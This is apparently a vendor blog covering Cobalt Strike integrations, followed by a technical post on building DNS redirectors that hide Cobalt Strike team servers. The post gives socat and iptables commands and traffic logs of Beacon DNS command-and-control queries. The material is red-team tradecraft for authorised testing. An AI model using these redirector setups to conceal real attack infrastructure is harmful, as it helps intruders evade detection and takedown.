Core Impact is typically used for exploitation and lateral movement and validating the attack paths often associated with a penetration test. Used by both in-house teams as well as third-party services, Core Impact offers capabilities for remote, local, and client-side exploitation. Impact also uses post-exploitation agents, which, while they don’t have a cool name like “Beacon,” are versatile in both their deployment and capabilities, including chaining and pivoting.   

While a previous blog dives deeper into the particulars, to quickly summarize, the interoperability piece comes in the form of session passing between both platforms. Those with both tools can deploy Beacon from within Core Impact. Additionally, users can spawn an Impact agent from within Cobalt Strike. If you have Cobalt Strike and would like to learn more, we recommend requesting a trial of Core Impact to try it out. 

Integration with Outflank’s RedELK Tool 

RedELK is an open-source tool that has been described by its creators as a “Red Team’s SIEM.” This highly usable tool tracks and sends Red Teams alerts about the activities of a Blue Team by creating a centralized hub for all traffic logs from redirectors to be sent and enriched.  Gaining visibility into the Blue Team’s movements enables Red Teams to make judicious choices about their next steps. These insights help Red Teams create a better learning experience and ensure Blue Teams get the most out of their engagements. 

Additionally, it also centralizes and enriches all operational logs from teamservers in order to provide a searchable history of the operation, which could be particularly helpful for longer and larger engagements. This all sounds like an ideal integration for Cobalt Strike users, right? While the sub-header is a fairly large spoiler, it is nonetheless very exciting that RedELK does fully support the Cobalt Strike framework.  

Community Kit Extensions  

We can’t say enough good things about the user community. So many of you have written first-rate tools and scripts that have further escalated the power of Cobalt Strike—we feel like an artist’s muse and the art the community creates is amazing. However, many of these extensions are tricky to find, so not everyone has had the opportunity to take advantage and learn from them. In order to highlight all of this hard work, we’ve created the Community Kit. This central repository showcases projects from the user community to ensure that they’re more easily discovered by fellow  security professionals. 

We encourage you to check it out to see the fantastic work of your peers which can help take raise the level of your next security engagement and may even inspire you to create and submit your own. Check back regularly as new submissions are coming in frequently.  

A Dynamic Framework  

Cobalt Strike was intentionally built as an adaptable framework so that users could continually change their behavior in an engagement. However, this flexibility has also enabled both expected and unexpected growth of the tool itself. Planned additions like the interoperability with Core Impact allows users to benefit from session passing, while unanticipated extensions like those in the community kit are equally welcome, as they enable users to truly make the tool their own. Ultimately, we’re excited to see such dedication to this tool from all angles, as it motivates us all to keep advancing Cobalt Strike to the next level so users can keep increasing the value of every engagement.   

Want to learn more about Core Impact? 

Get information on other ways Core Impact and Cobalt Strike complement one another for comprehensive infrastructure protection. 

Simple DNS Redirectors for Cobalt Strike

 

This post, from Ernesto Alvarez Capandeguy of Core Security’s CoreLabs Research Team, describes techniques used for creating UDP redirectors for protecting Cobalt Strike team servers. This is one of the recommended mechanisms for hiding Cobalt Strike team servers and involves adding different points which a Beacon can contact for instructions when using the HTTP channel.

Unlike HTTP Beacons, DNS Beacons do not contact the team server directly, but use the DNS infrastructure for carrying messages. In theory, the team server should be referenced in the DNS records so that all queries for the Command and Control (C2) domain are delivered properly. This would mean exposing the team server to the Internet, which is not desirable.

Just as HTTP redirectors can be used to hide the team server from outside scrutiny, a DNS redirector can be used for the same thing. In the case of DNS, redirectors are just one part of the solution, as alternative domains are also necessary in case the original domain is taken down. We will not cover these aspects here, as we’ll be concentrating on the redirection part.

Redirecting TCP traffic is straightforward. There is a very delimited set of data that clearly defines what constitutes a network connection (or flow). The state is explicit and can be easily determined from the packet stream. There are several generic proxies (e.g. SOCAT) that can simply proxy TCP connections on the user space. Options for secure proxying of TCP connections are also available (stunnel and SSH port forwarding are two well-known examples).

The situation is radically different for UDP. This is due to a few factors:

  • UDP is packet oriented, while TCP is byte/connection oriented.
  • UDP is stateless and keeping track of UDP “connections” requires second guessing the “connection” state.
  • UDP is handled very differently from TCP in userland.

In a TCP proxy operation, a connection is clearly defined. This connection can transmit EOF messages, so the proxy would always be aware of the state of the connection and would unambiguously know when it should release the connection resources.

UDP is more challenging, since without a way of directly sensing the DNS transaction state, SOCAT cannot know when to release the connection resources.

Simple Redirector Construction

The obvious solution for building a DNS redirector would be to use a DNS server. There are several choices for these, with differing features. We won’t touch on these options in this article, but will instead focus on simple redirectors that can be installed on minimal Linux systems and have a very small footprint.

Our redirectors will be based on the concept of diverting a UDP flow from the redirector’s local port to the team server in a way that the team server has to send the response back to the redirector, which will relay it to the Beacon.

There are two ways of achieving this goal: piping ports together and NAT.

Port Piping

We are all familiar with the concept of piping from a network port. Anyone can do it using netcat or an equivalent tool. Anyone with experience with any of these tools will also know that redirecting UDP traffic is sometimes problematic. A DNS redirector also has these problems, but they can be kept bounded.

For these tests, we are going to use SOCAT, a UNIX tool used to connect multiple types of inputs and outputs together. This tool can do the same thing as netcat but is more versatile.

Naive SOCAT Redirector

Before we jump into the solution, we should try to see the problems. Let’s attempt a naive approach to a DNS channel redirector. We can execute a straight SOCAT, and launch a Beacon pointed to our redirector, which will be executing the following:

# socat udp4-listen:53 udp4:teamserver.example.net:53

The initial installation works, and we see the ghost Beacon in the team server. However, any further communication fails. Monitoring the DNS traffic, we see the following:

# tcpdump -l -n -s 5655 -i eth0  udp port 53
 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
 
05:40:26.453966 IP 173.194.91.156.62931 > redirector.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454317 IP redirector.example.net.56494 > teamserver.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454593 IP teamserver.example.net.53 > redirector.example.net.56494: 55757- 1/0/0 A 0.0.0.0 (100)
05:40:26.454687 IP redirector.example.net.53 > 173.194.91.156.62931: 55757- 1/0/0 A 0.0.0.0 (100)
05:41:26.689753 IP 172.253.219.11.49854 > redirector.example.net.53: 56196% A? 7242b4ba.cobalt-domain.example.net. (51)
05:42:27.217514 IP 172.253.219.11.61868 > redirector.example.net.53: 28170% A? 7242b4ba.cobalt-domain.example.net. (51)
05:43:27.532055 IP 173.194.91.156.49467 > redirector.example.net.53: 59203% A? 7242b4ba.cobalt-domain.example.net. (51)
05:44:27.653780 IP 173.194.91.77.59444 > redirector.example.net.53: 14169% A? 7242b4ba.cobalt-domain.example.net. (51)
05:45:27.770012 IP 173.194.91.141.62374 > redirector.example.net.53: 52473% A? 7242b4ba.cobalt-domain.example.net. (51)
05:46:28.051530 IP 172.253.219.7.39179 > redirector.example.net.53: 26440% A? 7242b4ba.cobalt-domain.example.net. (51)
05:47:28.190316 IP 173.194.91.74.45768 > redirector.example.net.53: 41092% A? 7242b4ba.cobalt-domain.example.net. (51)

Well, the Beacon checked in fine, but after the first DNS request the pipeline stalls. This is because the UDP protocol is stateless. SOCAT never got the idea that the first transaction was over and is still waiting for data from the same source port, ignoring all the others.

This can easily be solved by telling SOCAT to fork for every packet it sees. Below we show our second attempt at doing a SOCAT redirector:

# socat udp4-listen:53,fork udp4:teamserver.example.net:53
 
# tcpdump -l -n -s 5655 -i eth0  udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
05:53:45.783953 IP 173.194.91.129.48083 > redirector.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784730 IP redirector.example.net.34472 > teamserver.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784860 IP teamserver.example.net.53 > redirector.example.net.34472: 3962- 1/0/0 A 0.0.0.0 (100)
05:53:45.784954 IP redirector.example.net.53 > 173.194.91.129.48083: 3962- 1/0/0 A 0.0.0.0 (100)
05:54:00.847401 IP 173.194.91.83.48991 > redirector.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848289 IP redirector.example.net.46902 > teamserver.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848436 IP teamserver.example.net.53 > redirector.example.net.46902: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:00.848541 IP redirector.example.net.53 > 173.194.91.83.48991: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:15.917608 IP 173.194.91.156.35560 > redirector.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918490 IP redirector.example.net.55342 > teamserver.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918615 IP teamserver.example.net.53 > redirector.example.net.55342: 29854- 1/0/0 A 0.0.0.0 (100)
05:54:15.918719 IP redirector.example.net.53 > 173.194.91.156.35560: 29854- 1/0/0 A 0.0.0.0 (100)

Our Beacon is now alive and communicating well! SOCAT now waits for packets coming from new sources and forwards them to our team server. While everything appears to be normal, this is unfortunately not the case, as this redirector will not work for long. Let’s inspect the process table:

# ps 
  PID TTY          TIME CMD
5365 pts/0    00:00:00 sudo
5366 pts/0    00:00:00 bash
5864 pts/0    00:00:00 socat
5865 pts/0    00:00:00 socat
5866 pts/0    00:00:00 socat
5867 pts/0    00:00:00 socat
5868 pts/0    00:00:00 socat
5869 pts/0    00:00:00 socat
5870 pts/0    00:00:00 socat
5871 pts/0    00:00:00 socat
5883 pts/0    00:00:00 socat
5886 pts/0    00:00:00 socat
5888 pts/0    00:00:00 socat
5889 pts/0    00:00:00 socat
5890 pts/0    00:00:00 socat
5891 pts/0    00:00:00 socat
5903 pts/0    00:00:00 socat
5904 pts/0    00:00:00 socat
5908 pts/0    00:00:00 socat
5910 pts/0    00:00:00 socat
5911 pts/0    00:00:00 socat
5912 pts/0    00:00:00 socat
5913 pts/0    00:00:00 socat
5914 pts/0    00:00:00 socat
5923 pts/0    00:00:00 ps

This does not look good. SOCAT processes are piling up. Let’s stress the redirector a bit by requesting a few screenshots and then check the process table:

# ps | grep socat | wc -l
3489

If we weren’t root, we would have run out of process slots long ago. Even the superuser will eventually have problems with this redirector:

socat udp4-listen:53,fork udp4:teamserver.example.net:53
2021/03/02 06:09:57 socat[5864] E fork(): Resource temporarily unavailable

As expected, we ran out of resources. Worse, we still have several thousand SOCAT processes waiting. The problem was caused because SOCAT does not notice that a transaction has run out, and still keeps its resources allocated.

Working UDP SOCAT Redirector

Now that we understand the problems involving UDP proxying, we can build a functional solution. The trick is telling SOCAT to drop the connections as soon as the transaction is complete. Telling SOCAT to apply a 5 second inactivity timeout should do the trick:

 # socat -T 5 udp4-listen:53,fork udp4:teamserver.example.net:53

In the example above, we told SOCAT that if no data is seen for five seconds, it should close the socket and assume that no further communication is needed.

While five seconds is a reasonable default timeout, we can attempt to optimize this value. To fine tune the timeout, we should understand the problem we’re facing. A DNS request is sent to our reflector, which is relayed to the team server. Once the team server answers, the transaction is over.

This limits our timeout to something we can control: the round-trip time between the redirector and the team server, including the time needed to process the request. A reasonable value would be twice the RTT between the hosts, to have some safety margin. Since our test hosts are in the same LAN, a timeout of one second should be more than enough for our example.

Below we show the process usage for five and one second timeouts:

The graph shows that the number of SOCAT processes rises as soon as there is activity, but the timeout causes the number of active processes to reach a plateau and stay at a certain value, depending on the activity and the timeout.

Working SOCAT UDP/TCP Redirector

We now have a working redirector. We can also use SOCAT for UDP to TCP translation. For every UDP packet received, we can fork and open a TCP connection, sending the DNS data via TCP. It is very important not to recycle connections, because UDP is packet oriented while TCP is not. We should never put more than one packet within a TCP connection, because two packets might be joined or split. In theory, SOCAT might decide to split a DNS request in two UDP packets, but this does not happen in practice. You should know that there is always that risk when doing UDP to TCP translations.

We tell SOCAT to take traffic from port 53, and for each packet, to open a connection to port 9191/tcp on the team server. The timeout is set to one second, which might be a bit too low, considering that TCP is involved:

# socat -T 1 udp4-listen:53,fork tcp4:teamserver.example.net:9191

Since we’re encapsulating our data within TCP, we need to run the following in the team server:

# socat -T 10 tcp4-listen:9191,fork udp4:127.0.0.1:53

Let’s now try generating some traffic and see what happens.

The dip in the middle represents a lapse in activity. The quick timeout allows for fast recovery. Overall, it’s not bad, but we also need to see how many open connections we have.

The numbers are somewhat high because TCP requires a wait period when a connection is closed from the client side. This is needed in case some control messages are lost and should not be removed for the protocol to operate properly. This is not a problem, though, because the number of resources allocated reach an equilibrium. A few RTT after the activity goes down, the resource usage drops as well.

Once we have the translation capability, we can take advantage of it. With DNS over TCP connections, we can take advantage of other proxying utilities, like stunnel or SSH’s port forwarding, and attempt to hide the team server from public scrutiny. The team server can be kept in an isolated network, without being exposed to the Internet.

NAT Based Redirectors

Another possible solution involves NAT. The concept behind a NAT redirector is to apply two NAT operations to incoming packets. The packet must be redirected to the team server, but at the same time, the packet must also be translated so that it appears to come from the redirector.

Failing to apply the second operation will cause the team server to answer the DNS query itself. The response will be ignored, as it will come from a different DNS server.

For our NAT redirector, we use Linux’s IPTABLES.

IPTABLES Based Redirector

IPTABLES is also well suited for use as a redirector. The Linux kernel’s NAT system automatically keeps track of connection state, even for UDP traffic. The detection is based on timers and inactivity, but the system is well developed and very stable.

The advantage of IPTABLES redirectors is that they’re lightning fast, incredibly efficient, and robust. Unlike SOCAT redirectors, iptables cannot convert from one protocol to another as IPTABLES works by packet mangling.

To create a working redirector, two things need to happen at the same time. Once a DNS query reaches the redirector, it must be redirected to the team server. This requires a DNAT operation.

However, if DNAT is used alone the packet will be diverted without changing the source address. As we already explained, this is not a good result, so we’ll also need to execute a SNAT operation.

The decision for doing the double NAT needs to be taken before any of the operations take place, as the DNAT change in the PREROUTING rule will erase important information present in the packet (namely whether this packet is addressed to the redirector or not).

To execute both operations simultaneously, we call the MARK target in the PREROUTING chain, and match the packet using every parameter of interest. Once the packet is marked, we can apply all operations both in the PREROUTING and POSTROUTING chains, completely changing the packet.

One final detail is that IP forwarding must be enabled in the redirector, since all these operations count as a forward, even if the packet is sent through the same interface it came in.

In the end, there are four commands that need to be called:

#enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward

#Mark incoming DNS packets with the tag 0x400
iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination my.ip.address 
--destination-port 53 -j MARK --set-mark 0x400

#For every marked packet, apply a DNAT and a SNAT (in this case, a MASQUERADE)
iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp 
-j DNAT --to-destination teamserver.example.net:53
iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE

Evaluating the capabilities listed in the proc filesystem, we see that we have 65,536 entries in the translation table (proc/sys/net/netfilter/nf_conntrack_max), and 16,384 buckets (/proc/sys/net/netfilter/nf_conntrack_buckets). This indicates that even at peak capacity, the lookups should be quick. These are default values and can be easily changed by writing a new number to the file, if necessary.

The system keeps track of the traffic passing through the redirector, so no action is needed for returning packets since they are translated back automatically.

To evaluate the performance of the redirector, we can measure the number of active NAT entries and how this number changes as the system is loaded. To measure this, we can read /proc/sys/net/netfilter/nf_conntrack_count.

Our experiment starts with a Beacon signaling at 15 second intervals. The Beacon is then made to signal continuously, followed by a high activity period. Once this activity period is over, the Beacon is reconfigured to its initial value of 15 seconds between polls.

In the test above we can see that the number of occupied slots depends on the network activity. With just one Beacon polling at 15 second intervals, the amount of conntrack slots is less than 10. If we switch to no delay, the value quickly grows to about 500, depending on availability throughput. When heavy activity is requested, the connection states steadily rise to 2500 and plateaus at 2700. Once activity ceases, connection tracks decrease until around 90 seconds, at which point they are all expired and the value stabilizes below 10.

IPTABLES redirectors perform quite well with very modest resources, even with default settings. This is not surprising, given the nature of the Linux kernel. Redirectors like this one can easily be deployed on the smallest computers or cloud instances. IPTABLES redirectors, once set up, are pretty much foolproof.

Summary

In this article, we saw three different implementations of DNS Beacon redirectors. Though these implementations have different advantages and disadvantages,  they are ultimately all very usable.

The IPTABLES based redirector is the quickest with the smallest footprint, being included by default in the kernel, and needing just four commands.

The SOCAT based redirectors are similar, the main difference being whether traffic is converted to TCP or not. UDP redirectors are simplest, but TCP redirectors have an advantage in the sense that TCP connections are easier to encapsulate, which is an advantage in special cases, like when the traffic must be tunneled via SSH.

Resource usage Speed Versatility Ease of Use Stability
SOCAT TCP 0 ++ + 0
SOCAT UDP + + + ++ +
IPTABLES ++ ++ 0 ++ ++